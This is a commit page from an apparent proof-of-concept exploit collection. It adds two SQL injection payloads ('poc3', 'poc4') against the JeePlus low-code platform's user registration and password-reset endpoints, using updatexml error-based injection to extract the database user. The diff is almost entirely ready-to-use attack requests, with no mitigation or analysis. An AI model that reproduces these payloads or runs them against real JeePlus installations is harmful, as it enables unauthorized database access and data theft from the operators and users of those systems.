admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update JeePlus低代码开发平台存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-07 20:21:45 +08:00 committed by GitHub
parent bb628c3f0c
commit ba37696e6e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
JeePlus低代码开发平台存在SQL注入漏洞.md
View File

@ -24,3 +24,13 @@ Accept: */*
Connection: Keep-Alive
Cookie: jeeplus.session.id=a24d6e112a864ef795cce1f664a6022a;
```
## poc3
```
/a/sys/register/registerUser?roleName=wangba&mobile=13300990099'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on
```
## poc4
```
/a/sys/user/resetPassword?mobile=13588888888'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23
```